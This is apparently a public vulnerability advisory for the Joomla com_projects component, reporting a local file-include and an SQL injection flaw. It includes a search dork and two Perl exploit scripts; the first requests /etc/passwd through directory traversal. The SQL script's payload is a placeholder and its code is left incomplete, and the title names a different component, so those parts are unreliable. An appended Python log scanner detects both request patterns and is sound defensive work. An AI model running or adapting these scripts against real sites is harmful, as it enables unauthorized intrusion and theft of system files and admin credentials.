source: https://www.securityfocus.com/bid/44456/info

The 'com_projects' component for Joomla! is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. By using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks.

=========================================================
JoomlaComponent com_projects LFI & SQL Vulnerability
=========================================================

[+]Title: JoomlaComponent com_calendrier RFI Vulnerability
[+]Author : jos_ali_joe
[+]Contact: josalijoe@yahoo.com
[+]Home : http://josalijoe.wordpress.com/

########################################################################
Dork : inurl:index.php?option="com_projects"
########################################################################
[ Software Information ]
########################################################################
[+] Vendor : http://www.codegravity.com/
[+] Download : http://www.joomla.org/download.html
[+] version : Joomla 1.5
[+] Vulnerability : LFI and SQL Vulnerability
[+] Dork : com_projects
########################################################################
[+] Exploit: LFI
====================================================================================
http://localhost/index.php?option=com_projects&controller=[ LFI ]
====================================================================================

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t########################################################\n\n";
print "\t\t#JoomlaComponent com_projects LFI Vulnerability#\n\n";
print "\t\t#by jos_ali_joe#\n\n";
print "\t\t########################################################\n\n";

if (!$ARGV[0])
{
print "Usage: perl idc.pl [HOST]\n";
print "Example: perl idc.pl http://localhost/LFI/\n";;
}
else
{
$web=$ARGV[0];
chomp $web;
$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";
my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;
if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}
}

####################################################################################
[+] Exploit: SQL
====================================================================================
http://localhost/index.php?option=com_projects&view=project&id=[ SQL ]
====================================================================================

use IO::Socket;
if(@ARGV < 1){
print "
[========================================================================
[// Joomla Component com_projects SQL Injection Exploit
[// Usage: idc.pl [target]
[// Example: idc.pl localhost.com
[// Vuln&Exp : jos_ali_joe
[========================================================================
";
exit();
}
#Local variables
$server = $ARGV[0];
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
$file = "/index.php?option=com_projects&view=project&id=";

print "Script <DIR> : ";
$dir = <STDIN>;
chop ($dir);

if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
}

$target = "SQL Injection Exploit";
$target = $host.$dir.$file.$target;

#Writing data to socket
print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: * /*\n";
print $socket "Connection: close\n\n";
print "+ Connected!...\n";
#Getting
while($answer = <$socket>) {
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

####################################################################################

Thanks :

./kaMtiEz ? ibl13Z ? Xrobot ? tukulesto ? R3m1ck ? jundab - asickboys- Vyc0d ? Yur4kha - XPanda - eL Farhatz
./ArRay ? akatsuchi ? K4pt3N ? Gameover ? antitos ? yuki ? pokeng ? ffadill - Alecs - v3n0m - RJ45
./Kiddies ? pL4nkt0n ? chaer newbie ? andriecom ? Abu_adam ? Petimati - hakz ? Virgi ? Anharku - a17z a.k.a maho
./Me Family ATeN4 :
./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe

Greets For :

./Devilzc0de crew ? Kebumen Cyber ? Explore Crew ? Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber

My Team : ./Indonesian Coder
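
A detection-side counterpart to the two request patterns in the advisory, added here as an example and not part of the original advisory or the component's code: it scans web access log lines for `option=com_projects` requests whose `controller` or `id` parameter falls outside an allowlist. The allowlist shapes, the finding labels, the `projects` controller name and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request field of a combined-format access log line: "METHOD URI PROTOCOL"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# Assumed legitimate shapes: a bare controller name and a numeric project id.
SAFE_CONTROLLER = re.compile(r"[A-Za-z0-9_]+")
SAFE_ID = re.compile(r"[0-9]+")


def classify(uri):
    """Return findings for one request URI; an empty list means clean."""
    params = parse_qs(urlsplit(uri).query, keep_blank_values=True)
    if "com_projects" not in params.get("option", []):
        return []
    findings = []
    # parse_qs percent-decodes once, so %00 arrives as a NUL character
    # and fails the allowlist together with any path separators or dots.
    if any(not SAFE_CONTROLLER.fullmatch(v) for v in params.get("controller", [])):
        findings.append("lfi-controller")
    if any(not SAFE_ID.fullmatch(v) for v in params.get("id", [])):
        findings.append("sqli-id")
    return findings


def scan(lines):
    """Return (line_number, findings) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        findings = classify(match.group(1)) if match else []
        if findings:
            hits.append((number, findings))
    return hits


# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Nov/2010:10:00:01 +0000] "GET /index.php?option=com_projects&view=project&id=7 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [01/Nov/2010:10:00:05 +0000] "GET /index.php?option=com_projects&controller=../../../../etc/passwd%00 HTTP/1.1" 200 1843',
    '192.0.2.44 - - [01/Nov/2010:10:00:09 +0000] "GET /index.php?option=com_projects&view=project&id=7%27 HTTP/1.1" 500 912',
    '192.0.2.10 - - [01/Nov/2010:10:00:12 +0000] "GET /index.php?option=com_content&id=../x HTTP/1.1" 200 300',
    '192.0.2.10 - - [01/Nov/2010:10:00:15 +0000] "GET /index.php?option=com_projects&controller=projects&id=12 HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOG):
        print(number, ",".join(findings))
```

The same two allowlists, applied inside the component before `controller` reaches a file include and before `id` reaches a query, are the corresponding input validation for the flaws described above.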